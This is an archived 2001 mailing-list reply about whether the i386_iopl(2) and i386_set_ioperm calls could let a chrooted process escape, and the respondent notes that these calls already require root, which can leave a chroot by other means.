|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: gabriel rosenkoetter (gr
eclipsed.net)Date: Fri Jul 13 2001 - 07:28:13 CDT
On Wed, Jul 11, 2001 at 10:18:05PM +1200, Dave Sainty wrote:
> It occurs to me that one could theoretically (but not easily) jump out
> of a chroot using i386_iopl(2) and related calls, possibly by
> manipulating the hard drives, possibly some other way.
>
> Perhaps these functions (i386_iopl, i386_set_ioperm) should be
> disabled for chrooted processes?
>
> A compile time option to disable them might be a good idea too?
> (Regardless of what security level you run your kernel at)
From i386_iopl(2):
DESCRIPTION
i386_iopl() sets the i386 I/O privilege level to the value specified by
iopl. This call is restricted to the super-user.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
If a chrooted daemon is running as root, you've already lost. (That
is, there are plenty of other ways for root to get out of a chroot
jail.)
--
~ g r eclipsed.net
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]